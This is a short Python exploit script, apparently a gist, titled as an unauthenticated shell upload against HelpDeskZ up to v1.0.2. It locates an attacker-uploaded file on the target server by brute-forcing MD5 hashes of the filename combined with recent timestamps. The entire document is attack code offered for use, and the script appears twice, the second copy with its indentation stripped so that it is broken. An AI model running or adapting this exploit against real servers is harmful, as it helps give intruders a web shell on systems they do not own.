SakiiR/exploit.py

## exploit.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# HelpDeskZ <= v1.0.2 - Unauthenticated Shell Upload
# @SakiiR

import sys
import requests
import hashlib
from time import time


def md5(data):
    return hashlib.md5(data).hexdigest()


def get(base, filename, at):
    uploaded_file = "{}/uploads/tickets/{}.{}".format(
        base.rstrip("/"), md5(filename + str(at)), filename.split(".")[-1]
    )

    r = requests.get(uploaded_file)
    if r.status_code == 200:
        return uploaded_file


def main(argv):
    if len(sys.argv) < 3:
        print("USAGE: {} HELPDESKZ_URL FILENAME".format(argv[0]))
        return
    for i in range(1000):
        url = get(argv[1], argv[2], int(time() - i))
        if url is not None:
            print(url)
            return
    print("Oops ... not found")


if __name__ == "__main__":
    main(sys.argv)
	#!/usr/bin/env python
	# -- coding: utf-8 --
	#
	# HelpDeskZ <= v1.0.2 - Unauthenticated Shell Upload
	# @SakiiR

	import sys
	import requests
	import hashlib
	from time import time


	def md5(data):
	return hashlib.md5(data).hexdigest()


	def get(base, filename, at):
	uploaded_file = "{}/uploads/tickets/{}.{}".format(
	base.rstrip("/"), md5(filename + str(at)), filename.split(".")[-1]
	)

	r = requests.get(uploaded_file)
	if r.status_code == 200:
	return uploaded_file


	def main(argv):
	if len(sys.argv) < 3:
	print("USAGE: {} HELPDESKZ_URL FILENAME".format(argv[0]))
	return
	for i in range(1000):
	url = get(argv[1], argv[2], int(time() - i))
	if url is not None:
	print(url)
	return
	print("Oops ... not found")


	if __name__ == "__main__":
	main(sys.argv)